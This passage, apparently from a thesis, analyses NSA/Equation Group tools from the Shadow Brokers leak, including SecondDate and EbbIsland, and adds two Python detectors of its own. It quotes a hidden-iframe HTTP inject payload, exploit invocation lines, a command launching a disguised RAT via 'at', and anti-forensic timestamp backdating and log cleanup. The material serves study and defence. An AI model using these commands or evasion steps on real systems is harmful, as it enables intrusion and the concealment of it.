The Linux opscript (NSA, 2008) consists of a total of 12000 lines, with approximately one third comments and the remainder shell commands. The opscript is basically a "Hack by numbers" guide. The last 10% of lines are the original "hand tasking" (manual hacking) methods.
A typical operator of Unix systems is a Mobile Network Operator. The opscript contains instructions to search for data available on the systems of such operators, e.g., Call Data Record (CDR) data, International Mobile Equipment Identity (IMEI) to IMSI associations and Cell ID to MSC addresses, as shown below:

### CDR data storage; Once you identify the location of the data, you'll
### checks for IMEIs that have more than one IMSI associated with it:
### generates a list of Cell IDs associated with each MSC address:

[1] https://github.com/x0rz/EQGRP/blob/master/Linux/bin/tunnel
[2] https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.linux_remove_in_install_ss.COMMON
[3] https://github.com/x0rz/EQGRP/blob/master/Linux/up/stoicctrls.tar/stoicctrls
[4] https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.stoicsurgeon.COMMON
Manual Hacking Methods
Due to its earlier origins and smaller size, the original hand tasking was examined first to provide an introduction as to how target systems are tasked or hacked. Two of the previously secret tools used to exploit information systems, SecondDate and EbbIsland, are described below.
The SecondDate command and control server can be used manually, with the documentation [5] providing example instructions for the user to configure the inject file, starting with the HTTP information and tag, as shown below:

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache,no-store
<inject_file_begin>
<html><meta http-equiv="refresh" content="0"><body><iframe
src="<REPLACE_WITH_URL_TO_USE>" height="1" width="1" scrolling="no" frameborder="0"
unselectable="yes" marginheight="0" marginwidth="0"></iframe></body></html>
<inject_file_end>
It continues by explaining that regular expressions to be passed to implants need to be stored in files without any extraneous characters or carriage returns, and provides two examples of how to achieve this:
vi -b -c "set noeol" <filename> # or
echo -n <regex> > <filename>
[5] https://github.com/misterch0c/shadowbroker/blob/master/Linux/doc/old/etc/user.tool.seconddate.COMMON
4.2. SHADOW BROKERS - NSA / EQUATION GROUP 48

Examples of rules which specify the IP address, network mask and port of the target, the maximum number of injections, the injection window, the regex file and the injection file are then provided:
rule 1 --srcaddr <target_network_address> --srcmask 255.255.255.0 --dstport 80 --maxinjections 10 --injectwindow 600 --nocheckregex --injectfile pkt
rule 1 --dstport 80 --maxinjections 2 --injectwindow 600 --regexfile <regex_file_1> --injectfile pkt
The SecondDate tool allows for the rules to be listed and enabled or disabled on an individual basis. Rules can also be checked for hits and the log can be checked, fetched or cleared.
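The inject file shown above is a complete HTTP response whose body is a zero-delay meta refresh plus a 1x1 invisible iframe pointing at a URL of the operator's choosing, served with no-cache/no-store headers so that no cache retains it. That combination is rare in legitimate content, which makes it a usable triage signature for proxy logs or packet captures. The following Python script is an added example and is not code from the thesis or from the SecondDate documentation; the two sample responses are constructed (with a placeholder URL) and the scoring rule is an assumption chosen for illustration.

```python
"""Flag HTTP responses that carry a hidden-iframe injection (added example)."""
import re

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
META_REFRESH_0_RE = re.compile(r'<meta\b[^>]*http-equiv="refresh"[^>]*content="0\b', re.I)


def split_response(raw):
    """Return (headers dict with lower-case keys and values, body text) for a raw response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.decode("latin-1").split("\r\n")[1:]:  # skip the status line
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip().lower()
    return headers, body.decode("latin-1", "replace")


def hidden_iframe_sources(body):
    """Return the src of every iframe that is at most one pixel high and wide."""
    sources = []
    for match in IFRAME_RE.finditer(body):
        # The attribute regex tolerates missing spaces between attributes,
        # as in the leaked inject file layout.
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(match.group(1))}
        if attrs.get("height") in ("0", "1") and attrs.get("width") in ("0", "1"):
            sources.append(attrs.get("src", ""))
    return sources


def assess_response(raw):
    """Score one response; 'suspicious' is set when the injection shape is present."""
    headers, body = split_response(raw)
    result = {
        "no_store": "no-store" in headers.get("cache-control", ""),
        "meta_refresh_0": bool(META_REFRESH_0_RE.search(body)),
        "hidden_iframe_sources": hidden_iframe_sources(body),
    }
    # Assumed rule: zero-delay refresh together with a hidden iframe is enough to flag.
    result["suspicious"] = result["meta_refresh_0"] and bool(result["hidden_iframe_sources"])
    return result


# Constructed sample mirroring the inject file layout, with a placeholder URL.
INJECTED = (
    b"HTTP/1.1 200 OK\r\nPragma: no-cache\r\nContent-Type: text/html\r\n"
    b"Cache-Control: no-cache,no-store\r\n\r\n"
    b'<html><meta http-equiv="refresh" content="0"><body><iframe '
    b'src="http://redirector.example/landing"height="1" width="1" scrolling="no" '
    b'frameborder="0" unselectable="yes" marginheight="0" marginwidth="0">'
    b"</iframe></body></html>"
)
# Constructed benign page: a normal-sized iframe and no refresh.
BENIGN = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    b'<html><body><h1>Welcome</h1><iframe src="/video" height="360" width="640">'
    b"</iframe></body></html>"
)

if __name__ == "__main__":
    for label, raw in (("injected", INJECTED), ("benign", BENIGN)):
        print(label, assess_response(raw))
```

The `no_store` indicator is reported but not required for the verdict, since many dynamic sites send no-store legitimately; the hidden iframe plus the zero-delay refresh is the part that matches the injection and rarely anything else.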
The EbbIsland tool is used to target Solaris versions 2.6 through 2.10. It does so by targeting a vulnerable RPC service, bootparam, with shellcode to provide a root shell account.
Noteworthy functionality includes a "load instead of a core file" scramble option. This runs the attack but substitutes the shellcode payload with random data, overwriting the previously generated core file with one that contains innocuous content. The stated intention was to allow the operator to remove traces of failed attempts to access the system.
It can be used with a port redirector; a general usage example, followed by a Solaris 2.9 specific example, is provided:
-tunnel
l <RHP> <TARGET IP> <BOOTPARAM_TCP_PORT>
l 32794 10.40.1.2 32790
./ebbisland -t <REDIRECTOR_IP> -p <REDIRECTOR_PORT> -r <TARGET_RPC.BOOTPARAMD_PROGRAMNUMBER> -X -N -A <SPECIFIC_SHELLCODE_ADDRESS>
./ebbisland -t 127.0.0.1 -p 32794 -r 100026 -X -N -A 0x6e908
Once root shell access has been gained following successful use of the tool, the packrat [6] tool can be used to package the Remote Access Trojan (RAT) binary, noserver [7], by renaming it to sendmail before compressing it, uuencoding it and making it available for upload. For more details see Appendix B.9.

[6] https://github.com/adamcaudill/EquationGroupLeak/tree/master/Linux/bin/packrat
[7] Linux/up/noserver
Checking the morerats sub-directory revealed that 32 bit noserver binaries were available for Apple Darwin (x86), AIX (RS/6000 v3.1), FreeBSD (x86), HPUX (PA RISC1.1) and Solaris (SPARC and x86).
The opscript reveals that packrat is meant to be used in conjunction with a port redirector via nstun. This provides access to packrat running on the hacker's local machine. The EbbIsland tool notes state that the method to launch the noserver binary (renamed as sendmail) is to use the at command with the now option before changing the timestamps of the at jobs and verifying that they have been changed to remove the signs of when the at job was created to launch the application (NSA, 2010).
# EXPLOIT WINDOW (CREATING AT JOB)
echo "PATH=. D=-ulrandom11111-55555-2 sendmail" | at now
netstat -an | grep random11111-55555-2

# TOUCH THE ATJOBS FILE BACK TO BEFORE TIME
touch -r x /var/spool/cron/atjobs

# VERIFY TIMES FROM BEFORE
ls -lart /var/spool/cron
ls -lart /var/spool/cron/atjobs
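The timestamp reset shown above relies on touch -r, which rewrites a file's access and modification times. The inode change time (ctime) cannot be set from user space on Solaris, Linux or BSD; the kernel updates it on every metadata change, including the touch itself, so the trick leaves a contradiction that ls -lart does not show but stat does. The following Python script is an added example, not code from the thesis or from the leaked tool notes: it flags a spool directory whose ctime is newer than its mtime, and a job entry whose ctime is newer than the mtime of the directory containing it. The spool path, the tolerance and the demo job body are assumptions chosen for illustration.

```python
"""Spot backdated at-job spool timestamps (added example)."""
import os
import tempfile
import time

# Assumed spool location; it is the path the opscript excerpt above touches.
DEFAULT_SPOOL = "/var/spool/cron/atjobs"


def find_backdated(spool_dir, tolerance_s=2.0):
    """Return (path, reason) tuples for timestamp anomalies in an at spool directory."""
    findings = []
    dir_st = os.stat(spool_dir)
    # touch -r resets the directory mtime, but the kernel records the touch in ctime.
    if dir_st.st_ctime - dir_st.st_mtime > tolerance_s:
        findings.append((spool_dir, "directory ctime newer than mtime: mtime was rewritten"))
    for name in sorted(os.listdir(spool_dir)):
        path = os.path.join(spool_dir, name)
        st = os.lstat(path)
        if st.st_ctime - st.st_mtime > tolerance_s:
            findings.append((path, "entry ctime newer than mtime: mtime was rewritten"))
        # Creating a job file bumps the directory mtime; a directory mtime older than
        # the file's ctime means the directory timestamp was rolled back afterwards.
        if st.st_ctime - dir_st.st_mtime > tolerance_s:
            findings.append((path, "directory mtime predates entry ctime: directory timestamp rolled back"))
    return findings


def demo(backdated=True):
    """Build a constructed spool in a temporary directory and return the findings for it."""
    spool = tempfile.mkdtemp(prefix="atjobs_demo_")
    with open(os.path.join(spool, "a00001.job"), "w") as fh:
        fh.write("PATH=. D=-ulrandom11111-55555-2 sendmail\n")  # constructed job body
    if backdated:
        old = time.time() - 86400  # pretend the spool was last changed a day ago
        os.utime(spool, (old, old))  # same effect as touch -r <older file> on the directory
    return find_backdated(spool)


if __name__ == "__main__":
    target = DEFAULT_SPOOL if os.path.isdir(DEFAULT_SPOOL) else None
    for path, reason in (find_backdated(target) if target else demo()):
        print(f"{path}: {reason}")
```

Legitimate metadata changes such as chmod or chown also move ctime without touching mtime, so a hit is a triage lead rather than proof; on the spool directory itself, however, there is seldom a benign reason for ctime to run a day ahead of mtime.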
A section on cleaning implores the hacker to use the correct exploit for the target architecture, to avoid the target RPC daemon aborting, core dumping and logging heavily. This is explained in more detail by the EbbIsland tool notes, which list the /core directory in addition to the /var/adm/messages log file as sources of evidence to be cleaned up. Both the opscript and the tool guides advocate using the -C option to clean up core files.